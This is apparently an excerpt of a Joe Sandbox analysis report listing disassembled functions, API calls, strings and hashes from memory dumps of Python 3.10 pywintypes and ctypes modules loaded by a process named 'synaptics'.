                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E086B6701215578B108A59D81498BF3FAEF846B47148235ED19DB304D731FD52C7D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1581217d13a1421eff9d4687b854414dd0e99477360d84bca06d1ea9e5224588
                                                                                                                                                                                                              • Instruction ID: d4138b784c62b9359c2b8ffe53aaa3e06d6023e3d9c20b5c3646806cd0d443b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1581217d13a1421eff9d4687b854414dd0e99477360d84bca06d1ea9e5224588
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C04C71614201DABF048E258A04B1676D59B44740F0049AD6454C12BDD374C440D615
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,_pointer_type_cache,046255C8,?,00000000,?,00000000,?,6C0A85E8), ref: 6C0A8138
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(046255C9,00000000,?,6C0A85E8), ref: 6C0A8155
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(046255C9,00000000,?,6C0A85E8), ref: 6C0A8173
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,COMError,6C0B6230,00000000,?,6C0A85E8), ref: 6C0A8187
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(6C0B6231), ref: 6C0A81A4
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000002), ref: 6C0A81AB
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,FUNCFLAG_HRESULT,00000000), ref: 6C0A81C5
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A81E2
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6C0A81E9
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,FUNCFLAG_STDCALL,00000000), ref: 6C0A8203
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A8220
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000001), ref: 6C0A8227
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,FUNCFLAG_CDECL,00000000), ref: 6C0A8241
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A825E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000008), ref: 6C0A8265
                                                                                                                                                                                                              • PyModule_AddObjectRef.PYTHON310(00000000,FUNCFLAG_USE_ERRNO,00000000), ref: 6C0A827F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocModule_Object$FromLongLong_
                                                                                                                                                                                                              • String ID: 1.1.0$ArgumentError$COMError$FUNCFLAG_CDECL$FUNCFLAG_HRESULT$FUNCFLAG_PYTHONAPI$FUNCFLAG_STDCALL$FUNCFLAG_USE_ERRNO$FUNCFLAG_USE_LASTERROR$RTLD_GLOBAL$RTLD_LOCAL$__version__$_cast_addr$_memmove_addr$_memset_addr$_pointer_type_cache$_string_at_addr$_wstring_at_addr
                                                                                                                                                                                                              • API String ID: 1501800201-3907785099
                                                                                                                                                                                                              • Opcode ID: 92dd6d21e346151c7cd0db5ae591deaf9c62fcbb81669e75fad4959b026e96cd
                                                                                                                                                                                                              • Instruction ID: 94a48ae629fae0802250b9a4d06484415440aa80fbcdc703fe52a0ad98a8337e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92dd6d21e346151c7cd0db5ae591deaf9c62fcbb81669e75fad4959b026e96cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80C1B4B06041865BE704CBB59D84BAB77FCAF4565CB140636ED0AE2702FF33D525CA92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0A2
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,pywintypes: can not setup interpreter state, as current state is invalid), ref: 6BF4B0B7
                                                                                                                                                                                                              • PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0C6
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008), ref: 6BF4B0D0
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,Out of memory allocating thread state.), ref: 6BF4B0E6
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4B0F5
                                                                                                                                                                                                              • PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0FD
                                                                                                                                                                                                              • PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B102
                                                                                                                                                                                                              • PyDict_New.PYTHON310 ref: 6BF4B11B
                                                                                                                                                                                                              • PyUnicode_DecodeMBCS.PYTHON310(pywintypes,0000000A,ignore), ref: 6BF4B133
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4B148
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,Exception,6C7EA6F4), ref: 6BF4B16C
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,__name__,00000000), ref: 6BF4B175
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF4B186
                                                                                                                                                                                                              • PyImport_ImportModule.PYTHON310(builtins), ref: 6BF4B190
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,__builtins__,00000000), ref: 6BF4B1A6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF4B1BE
                                                                                                                                                                                                              • PyRun_StringFlags.PYTHON310(class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =,00000101,00000000,00000000,00000000), ref: 6BF4B1D1
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4B1E8
                                                                                                                                                                                                              • PyDict_GetItemString.PYTHON310(00000000,error), ref: 6BF4B1F9
                                                                                                                                                                                                              • PyDict_GetItemString.PYTHON310(00000000,com_error), ref: 6BF4B20F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4B225
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B235
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B248
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B25B
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B26E
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B281
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B294
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B2A7
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B2BA
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B2CD
                                                                                                                                                                                                              • PyCapsule_Import.PYTHON310(datetime.datetime_CAPI,00000000), ref: 6BF4B2E2
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6BF5A0A8), ref: 6BF4B32E
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF4B34C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • pywintypes, xrefs: 6BF4B12E
                                                                                                                                                                                                              • datetime.datetime_CAPI, xrefs: 6BF4B2DD
                                                                                                                                                                                                              • PyWinInterpreterState_Ensure, xrefs: 6BF4B0B2, 6BF4B0E1
                                                                                                                                                                                                              • com_error, xrefs: 6BF4B209
                                                                                                                                                                                                              • __builtins__, xrefs: 6BF4B1A0
                                                                                                                                                                                                              • error, xrefs: 6BF4B1F3
                                                                                                                                                                                                              • Out of memory allocating thread state., xrefs: 6BF4B0DC
                                                                                                                                                                                                              • ignore, xrefs: 6BF4B127
                                                                                                                                                                                                              • pywintypes: can not setup interpreter state, as current state is invalid, xrefs: 6BF4B0AD
                                                                                                                                                                                                              • __name__, xrefs: 6BF4B16F
                                                                                                                                                                                                              • Exception, xrefs: 6BF4B166
                                                                                                                                                                                                              • class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =, xrefs: 6BF4B1CC
                                                                                                                                                                                                              • builtins, xrefs: 6BF4B18B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ReadyType_$DeallocDict_String$Item$State_SwapThread$ErrorFatalFuncImport$AllocCapsule_DecodeFlagsImport_LocalModuleRun_Unicode_Value
                                                                                                                                                                                                              • String ID: Exception$Out of memory allocating thread state.$PyWinInterpreterState_Ensure$__builtins__$__name__$builtins$class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =$com_error$datetime.datetime_CAPI$error$ignore$pywintypes$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                              • API String ID: 3663264411-1312685011
                                                                                                                                                                                                              • Opcode ID: d7a51c6a0a419f49df5b4d6ef9205b9dd5ef4fd1b98c40e425ec6d6a22a2293b
                                                                                                                                                                                                              • Instruction ID: de57ba2d6684c49d2dff3861a975285f96f8f87a49e89417fc17a5173c1c1205
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7a51c6a0a419f49df5b4d6ef9205b9dd5ef4fd1b98c40e425ec6d6a22a2293b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1961067391411457EB059B7C9C80B5E3FA0EF56338F100761E935922F3EB2AD57A8AB2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinGlobals_Ensure@@YAHXZ.PYWINTYPES310 ref: 6BF4B414
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0A2
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,pywintypes: can not setup interpreter state, as current state is invalid), ref: 6BF4B0B7
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0C6
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: LocalAlloc.KERNEL32(00000040,00000008), ref: 6BF4B0D0
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,Out of memory allocating thread state.), ref: 6BF4B0E6
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: TlsSetValue.KERNEL32(00000000), ref: 6BF4B0F5
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B0FD
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyThreadState_Swap.PYTHON310(00000000), ref: 6BF4B102
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyDict_New.PYTHON310 ref: 6BF4B11B
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: PyUnicode_DecodeMBCS.PYTHON310(pywintypes,0000000A,ignore), ref: 6BF4B133
                                                                                                                                                                                                                • Part of subcall function 6BF4B090: _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4B148
                                                                                                                                                                                                              • PyModule_Create2.PYTHON310(6BF5A24C,000003F5), ref: 6BF4B42C
                                                                                                                                                                                                              • PyModule_GetDict.PYTHON310(00000000), ref: 6BF4B440
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,error,04843960), ref: 6BF4B47A
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,com_error), ref: 6BF4B494
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,TRUE), ref: 6BF4B4AE
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,FALSE), ref: 6BF4B4C8
                                                                                                                                                                                                              • PyModule_AddIntConstant.PYTHON310(00000000,WAVE_FORMAT_PCM,00000001), ref: 6BF4B4DE
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,TimeType,6BF5A0A8), ref: 6BF4B4FB
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B514
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,IIDType,?), ref: 6BF4B52D
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B540
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,SECURITY_DESCRIPTORType,?), ref: 6BF4B559
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B56C
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,SECURITY_ATTRIBUTESType,?), ref: 6BF4B585
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B598
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,SIDType,?), ref: 6BF4B5B1
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B5C4
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,ACLType,?), ref: 6BF4B5DD
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B5F0
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,HANDLEType,?), ref: 6BF4B609
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B61C
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,OVERLAPPEDType,?), ref: 6BF4B635
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B644
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,DEVMODEWType,?), ref: 6BF4B659
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,DEVMODEType,?), ref: 6BF4B66E
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(?), ref: 6BF4B67D
                                                                                                                                                                                                              • PyDict_SetItemString.PYTHON310(00000000,WAVEFORMATEXType,?), ref: 6BF4B692
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,Could not initialise the error objects), ref: 6BF4B6AF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dict_String$Item$ReadyType_$State_SwapThread$Module_$ErrorFatalFunc$AllocConstantCreate2DeallocDecodeDictEnsure@@Err_Globals_LocalUnicode_Value
                                                                                                                                                                                                              • String ID: ACLType$Could not initialise the error objects$DEVMODEType$DEVMODEWType$FALSE$HANDLEType$IIDType$OVERLAPPEDType$SECURITY_ATTRIBUTESType$SECURITY_DESCRIPTORType$SIDType$TRUE$TimeType$WAVEFORMATEXType$WAVE_FORMAT_PCM$com_error$error
                                                                                                                                                                                                              • API String ID: 1770953712-313003814
                                                                                                                                                                                                              • Opcode ID: 5775bc9c9d674812da7e764b73ea507fa329431df490b351df929743c9953b41
                                                                                                                                                                                                              • Instruction ID: cb51541b47da17a27f6e6e5ad5eb59b18bcd41b3982b4f20244aa79476b90392
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5775bc9c9d674812da7e764b73ea507fa329431df490b351df929743c9953b41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3851777358642422D915227C1C81ADD3A548E722367250BE1FC3DE25F3EA1F92BF46BB
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyGILState_Ensure.PYTHON310 ref: 6C0A8803
                                                                                                                                                                                                              • PySequence_Size.PYTHON310(?), ref: 6C0A8810
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(?), ref: 6C0A8832
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000), ref: 6C0A8842
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(?), ref: 6C0A8864
                                                                                                                                                                                                                • Part of subcall function 6C0A8780: PySys_GetObject.PYTHON310(stderr), ref: 6C0A8799
                                                                                                                                                                                                                • Part of subcall function 6C0A8780: PyOS_vsnprintf.PYTHON310(?,00000200,?,?), ref: 6C0A87B4
                                                                                                                                                                                                                • Part of subcall function 6C0A8780: PyFile_WriteString.PYTHON310(?,00000000), ref: 6C0A87D1
                                                                                                                                                                                                                • Part of subcall function 6C0A8780: PyErr_Print.PYTHON310 ref: 6C0A87DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cannot build parameter, xrefs: 6C0A8A64
                                                                                                                                                                                                              • unexpected result of create argument %zd:, xrefs: 6C0A8A4B
                                                                                                                                                                                                              • Parsing argument %zd, xrefs: 6C0A8A72
                                                                                                                                                                                                              • getting _needs_com_addref_, xrefs: 6C0A89AF
                                                                                                                                                                                                              • Getting argument converter %zd, xrefs: 6C0A8A82
                                                                                                                                                                                                              • on converting result of ctypes callback function, xrefs: 6C0A8BE6
                                                                                                                                                                                                              • on calling ctypes callback function, xrefs: 6C0A8B1D
                                                                                                                                                                                                              • memory leak in callback function., xrefs: 6C0A8BC8
                                                                                                                                                                                                              • BUG: PySequence_Length, xrefs: 6C0A8822
                                                                                                                                                                                                              • create argument %zd:, xrefs: 6C0A8A04
                                                                                                                                                                                                              • PyTuple_New(), xrefs: 6C0A8854
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: State_$Release$EnsureErr_File_ObjectPrintS_vsnprintfSequence_SizeStringSys_Tuple_Write
                                                                                                                                                                                                              • String ID: BUG: PySequence_Length$Getting argument converter %zd$Parsing argument %zd$PyTuple_New()$cannot build parameter$create argument %zd:$getting _needs_com_addref_$memory leak in callback function.$on calling ctypes callback function$on converting result of ctypes callback function$unexpected result of create argument %zd:
                                                                                                                                                                                                              • API String ID: 3259657655-774023293
                                                                                                                                                                                                              • Opcode ID: aa2950f6059802650ea65e4e0171c0231f1315c20165f9c38f6e7a1f529cb72f
                                                                                                                                                                                                              • Instruction ID: 457232d97aa966d3a36d1d07eb58e6d6dd03ce98b95c1f19c077f6b7f59fe916
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa2950f6059802650ea65e4e0171c0231f1315c20165f9c38f6e7a1f529cb72f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55C1B3B1A042819FDF00DFE4CD45B9E77F4BF06328F180626E919A7652DB32E912CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9A14,ffi_prep_cif failed), ref: 6C0A9C12
                                                                                                                                                                                                              • ffi_prep_cif.LIBFFI-7(011FC7C7,00000002,?,?,?,011FC7C7,00000000,?,?), ref: 6C0A9C4F
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0A9C8B
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9CA9
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9CB6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0A9CD2
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 6C0A9CDF
                                                                                                                                                                                                              • ffi_call.LIBFFI-7(?,?,?,?), ref: 6C0A9CF8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0A9D89
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 6C0A9D96
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9DA7
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9DB4
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A9DC6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A9DDC
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.seh_exception,6C0B2280,00000000), ref: 6C0A9DF8
                                                                                                                                                                                                                • Part of subcall function 6C0A9370: PyThreadState_GetDict.PYTHON310(?,?,?,6C0A9C72), ref: 6C0A9378
                                                                                                                                                                                                                • Part of subcall function 6C0A9370: PyErr_SetString.PYTHON310(6C7E9A14,cannot get thread state,?,6C0A9C72), ref: 6C0A9390
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • exception: single step, xrefs: 6C0A9E33
                                                                                                                                                                                                              • exception: datatype misalignment, xrefs: 6C0A9E51
                                                                                                                                                                                                              • exception: stack over/underflow, xrefs: 6C0A9F14
                                                                                                                                                                                                              • exception: array bounds exceeded, xrefs: 6C0A9EBA
                                                                                                                                                                                                              • exception: access violation writing %p, xrefs: 6C0A9E86
                                                                                                                                                                                                              • exception: floating-point operand denormal, xrefs: 6C0A9EC9
                                                                                                                                                                                                              • exception: float divide by zero, xrefs: 6C0A9ED8
                                                                                                                                                                                                              • exception: integer overflow, xrefs: 6C0A9F50
                                                                                                                                                                                                              • exception: float invalid operation, xrefs: 6C0A9EF6
                                                                                                                                                                                                              • ctypes.seh_exception, xrefs: 6C0A9DF3
                                                                                                                                                                                                              • exception: float inexact, xrefs: 6C0A9EE7
                                                                                                                                                                                                              • exception: float underflow, xrefs: 6C0A9F32
                                                                                                                                                                                                              • exception: privileged instruction, xrefs: 6C0A9F5F
                                                                                                                                                                                                              • exception: stack overflow, xrefs: 6C0A9F23
                                                                                                                                                                                                              • No ffi_type for result, xrefs: 6C0A9C06
                                                                                                                                                                                                              • ffi_prep_cif failed, xrefs: 6C0A9C5C
                                                                                                                                                                                                              • exception: integer divide by zero, xrefs: 6C0A9F41
                                                                                                                                                                                                              • exception: nocontinuable, xrefs: 6C0A9F6E
                                                                                                                                                                                                              • exception: float overflow, xrefs: 6C0A9F05
                                                                                                                                                                                                              • exception: access violation reading %p, xrefs: 6C0A9E71
                                                                                                                                                                                                              • exception: breakpoint encountered, xrefs: 6C0A9E42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_errno$Thread$Err_Eval_String$AuditDeallocDictRestoreSaveState_Sys_ffi_callffi_prep_cif
                                                                                                                                                                                                              • String ID: No ffi_type for result$ctypes.seh_exception$exception: access violation reading %p$exception: access violation writing %p$exception: array bounds exceeded$exception: breakpoint encountered$exception: datatype misalignment$exception: float divide by zero$exception: float inexact$exception: float invalid operation$exception: float overflow$exception: float underflow$exception: floating-point operand denormal$exception: integer divide by zero$exception: integer overflow$exception: nocontinuable$exception: privileged instruction$exception: single step$exception: stack over/underflow$exception: stack overflow$ffi_prep_cif failed
                                                                                                                                                                                                              • API String ID: 6638613-3521937471
                                                                                                                                                                                                              • Opcode ID: 3a7614d1fa4b229284caa0f36197d302141d82d196091064e606b81b08cbcc8b
                                                                                                                                                                                                              • Instruction ID: 5a5c0636a796b8bf5b386fb2f28fd02ae818e6798ea0da6eff52892af82c2b0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a7614d1fa4b229284caa0f36197d302141d82d196091064e606b81b08cbcc8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5A138B4B09A44AFCF04CFD8CA48B9D7BF4EF06308F108915E915A7A52DB33A855CB58
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(00000000,6C0B6904,?), ref: 6C0A3436
                                                                                                                                                                                                              • PyUnicode_AsUTF8AndSize.PYTHON310(?,?), ref: 6C0A3472
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,class must define a '_type_' string attribute), ref: 6C0A3818
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A3834
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A383F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cbBhHiIlLdfuzZqQPXOv?g, xrefs: 6C0A34A1, 6C0A34B8
                                                                                                                                                                                                              • _type_ '%s' not supported, xrefs: 6C0A34E6
                                                                                                                                                                                                              • class must define a '_type_' attribute which must bea single character string containing one of '%s'., xrefs: 6C0A34BD
                                                                                                                                                                                                              • 0bal, xrefs: 6C0A3594, 6C0A378F
